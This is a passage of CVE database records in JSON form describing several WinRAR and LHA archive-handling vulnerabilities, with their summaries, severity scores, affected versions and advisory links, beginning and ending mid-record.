"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the \"Add to archive\" command in WinRAR 3.51 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code by tricking the user into adding a file whose filename contains a non-default code page and non-ANSI characters, as demonstrated using a Chinese filename, possibly due to buffer expansion when using the WideCharToMultiByte API. NOTE: it is not clear whether this problem can be exploited for code execution. If not, then perhaps the user-assisted nature of the attack should exclude the issue from inclusion in CVE."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "290",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/290"
},
{
"name": "20051221 WinRAR - Processing Filename Incorrectly Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/420006/100/0/threaded"
},
{
"name": "15999",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/15999"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-4474",
"datePublished": "2005-12-22T01:00:00",
"dateReserved": "2005-12-21T00:00:00",
"dateUpdated": "2024-08-07T23:46:05.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-20253
Vulnerability from cvelistv5
Published
2019-02-13 01:00
Modified
2024-08-05 11:58
Severity ?
EPSS score ?
Summary
In WinRAR versions prior to and including 5.60, There is an out-of-bounds write vulnerability during parsing of a crafted LHA / LZH archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user.
References
| ▼ | URL | Tags |
|---|---|---|
| https://research.checkpoint.com/extracting-code-execution-from-winrar/ | x_refsource_MISC | |
| https://www.win-rar.com/whatsnew.html | x_refsource_MISC |
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| Check Point Software Technologies Ltd. | WinRAR |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:58:19.154Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WinRAR",
"vendor": "Check Point Software Technologies Ltd.",
"versions": [
{
"status": "affected",
"version": "All versions prior and including 5.60"
}
]
}
],
"datePublic": "2019-02-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In WinRAR versions prior to and including 5.60, There is an out-of-bounds write vulnerability during parsing of a crafted LHA / LZH archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-14T17:57:01",
"orgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"shortName": "checkpoint"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@checkpoint.com",
"ID": "CVE-2018-20253",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WinRAR",
"version": {
"version_data": [
{
"version_value": "All versions prior and including 5.60"
}
]
}
}
]
},
"vendor_name": "Check Point Software Technologies Ltd."
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In WinRAR versions prior to and including 5.60, There is an out-of-bounds write vulnerability during parsing of a crafted LHA / LZH archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-787: Out-of-bounds Write"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"refsource": "MISC",
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "https://www.win-rar.com/whatsnew.html",
"refsource": "MISC",
"url": "https://www.win-rar.com/whatsnew.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"assignerShortName": "checkpoint",
"cveId": "CVE-2018-20253",
"datePublished": "2019-02-13T01:00:00",
"dateReserved": "2018-12-19T00:00:00",
"dateUpdated": "2024-08-05T11:58:19.154Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2005-3262
Vulnerability from cvelistv5
Published
2005-10-20 04:00
Modified
2024-08-07 23:01
Severity ?
EPSS score ?
Summary
Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE file, which are not properly handled when WinRAR displays diagnostic errors related to an invalid filename.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/15062 | vdb-entry, x_refsource_BID | |
| http://secunia.com/advisories/16973/ | third-party-advisory, x_refsource_SECUNIA | |
| http://www.rarlabs.com/rarnew.htm | x_refsource_CONFIRM | |
| http://secunia.com/secunia_research/2005-53/advisory/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T23:01:59.422Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "15062",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "16973",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/16973/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-10-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE file, which are not properly handled when WinRAR displays diagnostic errors related to an invalid filename."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2005-11-04T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "15062",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "16973",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/16973/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3262",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE file, which are not properly handled when WinRAR displays diagnostic errors related to an invalid filename."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "15062",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/15062"
},
{
"name": "16973",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/16973/"
},
{
"name": "http://www.rarlabs.com/rarnew.htm",
"refsource": "CONFIRM",
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "http://secunia.com/secunia_research/2005-53/advisory/",
"refsource": "MISC",
"url": "http://secunia.com/secunia_research/2005-53/advisory/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3262",
"datePublished": "2005-10-20T04:00:00",
"dateReserved": "2005-10-20T00:00:00",
"dateUpdated": "2024-08-07T23:01:59.422Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2004-0235
Vulnerability from cvelistv5
Published
2004-05-05 04:00
Modified
2024-08-08 00:10
Severity ?
EPSS score ?
Summary
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path").
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:10:03.724Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "CLA-2004:840",
"tags": [
"vendor-advisory",
"x_refsource_CONECTIVA",
"x_transferred"
],
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "FEDORA-2004-119",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "10243",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "lha-directory-traversal(16013)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
},
{
"name": "RHSA-2004:179",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"name": "FLSA:1833",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "oval:org.mitre.oval:def:978",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
},
{
"name": "oval:org.mitre.oval:def:10409",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-04-30T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\")."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-10-10T00:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "CLA-2004:840",
"tags": [
"vendor-advisory",
"x_refsource_CONECTIVA"
],
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "FEDORA-2004-119",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "10243",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "lha-directory-traversal(16013)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
},
{
"name": "RHSA-2004:179",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"name": "FLSA:1833",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "oval:org.mitre.oval:def:978",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
},
{
"name": "oval:org.mitre.oval:def:10409",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-0235",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\")."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "CLA-2004:840",
"refsource": "CONECTIVA",
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "FEDORA-2004-119",
"refsource": "FEDORA",
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "10243",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "lha-directory-traversal(16013)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
},
{
"name": "RHSA-2004:179",
"refsource": "REDHAT",
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"name": "FLSA:1833",
"refsource": "FEDORA",
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"refsource": "REDHAT",
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "oval:org.mitre.oval:def:978",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
},
{
"name": "oval:org.mitre.oval:def:10409",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-0235",
"datePublished": "2004-05-05T04:00:00",
"dateReserved": "2004-03-17T00:00:00",
"dateUpdated": "2024-08-08T00:10:03.724Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-38831
Vulnerability from cvelistv5
Published
2023-08-23 00:00
Modified
2024-08-02 17:54
Severity ?
EPSS score ?
Summary
RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023.
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:rarlab:winrar:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "winrar",
"vendor": "rarlab",
"versions": [
{
"lessThan": "6.23",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-38831",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-29T18:48:48.346127Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2023-08-24",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2023-38831"
},
"type": "kev"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-351",
"description": "CWE-351 Insufficient Type Distinction",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:27:57.283Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:54:38.543Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/"
},
{
"tags": [
"x_transferred"
],
"url": "https://news.ycombinator.com/item?id=37236100"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-23T00:10:57.118648",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/"
},
{
"url": "https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/"
},
{
"url": "https://news.ycombinator.com/item?id=37236100"
},
{
"url": "http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html"
},
{
"url": "https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-38831",
"datePublished": "2023-08-23T00:00:00",
"dateReserved": "2023-07-25T00:00:00",
"dateUpdated": "2024-08-02T17:54:38.543Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-40477
Vulnerability from cvelistv5
Published
2024-05-03 02:11
Modified
2024-08-02 18:31
Severity ?
EPSS score ?
Summary
RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.zerodayinitiative.com/advisories/ZDI-23-1152/ | x_research-advisory | |
| https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=232&cHash=c5bf79590657e32554c6683296a8e8aa | vendor-advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:rarlab:winrar:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "winrar",
"vendor": "rarlab",
"versions": [
{
"status": "affected",
"version": "6.21"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-40477",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-18T13:35:58.103184Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-18T13:47:35.415Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:31:53.902Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ZDI-23-1152",
"tags": [
"x_research-advisory",
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1152/"
},
{
"name": "vendor-provided URL",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.win-rar.com/singlenewsview.html?\u0026L=0\u0026tx_ttnews%5Btt_news%5D=232\u0026cHash=c5bf79590657e32554c6683296a8e8aa"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "WinRAR",
"vendor": "RARLAB",
"versions": [
{
"status": "affected",
"version": "6.21"
}
]
}
],
"dateAssigned": "2023-08-14T16:14:46.683-05:00",
"datePublic": "2023-08-17T14:42:16.400-05:00",
"descriptions": [
{
"lang": "en",
"value": "RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233."
}
],
"metrics": [
{
"cvssV3_0": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-129",
"description": "CWE-129: Improper Validation of Array Index",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-03T02:11:12.905Z",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "ZDI-23-1152",
"tags": [
"x_research-advisory"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1152/"
},
{
"name": "vendor-provided URL",
"tags": [
"vendor-advisory"
],
"url": "https://www.win-rar.com/singlenewsview.html?\u0026L=0\u0026tx_ttnews%5Btt_news%5D=232\u0026cHash=c5bf79590657e32554c6683296a8e8aa"
}
],
"source": {
"lang": "en",
"value": "goodbyeselene"
},
"title": "RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2023-40477",
"datePublished": "2024-05-03T02:11:12.905Z",
"dateReserved": "2023-08-14T21:06:28.913Z",
"dateUpdated": "2024-08-02T18:31:53.902Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2008-7144
Vulnerability from cvelistv5
Published
2009-09-01 16:00
Modified
2024-08-07 11:56
Severity ?
EPSS score ?
Summary
Multiple unspecified vulnerabilities in RARLAB WinRAR before 3.71 have unknown impact and attack vectors related to crafted (1) ACE, (2) ARJ, (3) BZ2, (4) CAB, (5) GZ, (6) LHA, (7) RAR, (8) TAR, or (9) ZIP files, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/29407 | third-party-advisory, x_refsource_SECUNIA | |
| http://osvdb.org/43439 | vdb-entry, x_refsource_OSVDB | |
| http://www.vupen.com/english/advisories/2008/0916/references | vdb-entry, x_refsource_VUPEN | |
| http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/41251 | vdb-entry, x_refsource_XF | |
| http://www.ee.oulu.fi/research/ouspg/protos/testing/c10/archive/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T11:56:14.177Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "29407",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/29407"
},
{
"name": "43439",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/43439"
},
{
"name": "ADV-2008-0916",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/0916/references"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html"
},
{
"name": "winrar-archives-code-execution(41251)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41251"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c10/archive/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-03-17T00:00:00",
"descriptions": [
{
